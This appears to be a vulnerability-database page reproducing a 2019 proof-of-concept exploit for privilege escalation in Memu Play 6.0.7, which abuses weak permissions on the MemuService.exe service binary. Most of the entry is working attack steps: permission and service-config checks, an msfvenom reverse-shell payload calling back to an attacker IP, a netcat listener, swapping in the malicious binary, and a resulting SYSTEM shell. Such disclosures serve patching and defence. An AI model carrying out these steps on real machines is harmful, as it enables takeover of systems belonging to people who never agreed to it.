Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Memu Play 6.0.7 Privilege Escalation

🗓️ 20 Feb 2019 00:00:00Reported by Alejandra SanchezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

Memu Play 6.0.7 Privilege Escalation due to insecure file permissions, leading to system level compromise by replacing MemuService.exe with a malicious file

Code
`# Exploit Title: Memu Play 6.0.7 - Privilege Escalation (PoC)  
# Date: 20/02/2019  
# Author: Alejandra SA!nchez  
# Vendor Homepage: https://www.memuplay.com/  
# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release  
# Version: 6.0.7  
# Tested on: Windows 10 / Windows 7  
  
  
# Description:  
# Memu Play 6.0.7 suffers from Privilege Escalation due to insecure file permissions  
  
# Prerequisites  
# Local, Low privilege access with restart capabilities  
  
# Details  
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.   
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace   
# with a malicious file that would connect back to an attacking computer giving system level privileges   
# (nt authority\system) due to the service running as Local System.   
# While a low privilege user is unable to restart the service through the application, a restart of the   
# computer triggers the execution of the malicious file.  
  
  
C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"  
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)  
BUILTIN\Administrators:(I)(F)  
BUILTIN\Users:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
  
  
Successfully processed 1 files; Failed processing 0 files  
  
  
C:\>sc qc MEmuSVC  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: MEmuSVC  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
  
  
# Proof of Concept  
  
1. Generate malicious .exe on attacking machine  
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe  
  
2. Setup listener and ensure apache is running on attacking machine  
nc -lvp 443  
service apache2 start  
  
3. Download malicious .exe on victim machine  
Open browser to http://192.168.1.130/MemuService.exe and download  
  
4. Overwrite file and copy malicious .exe.  
Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak  
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\  
  
5. Restart victim machine  
  
6. Reverse Shell on attacking machine opens  
C:\Windows\system32>whoami  
whoami  
nt authority\system  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Feb 2019 00:00Current
0.7Low risk
Vulners AI Score0.7
memu play 6.0.7privilege escalationinsecure file permissionssystem compromisemalicious filelocal systemwindows 10windows 7exploitvulnerabilityproof of conceptmicrovirtfile overwritereverse shell
32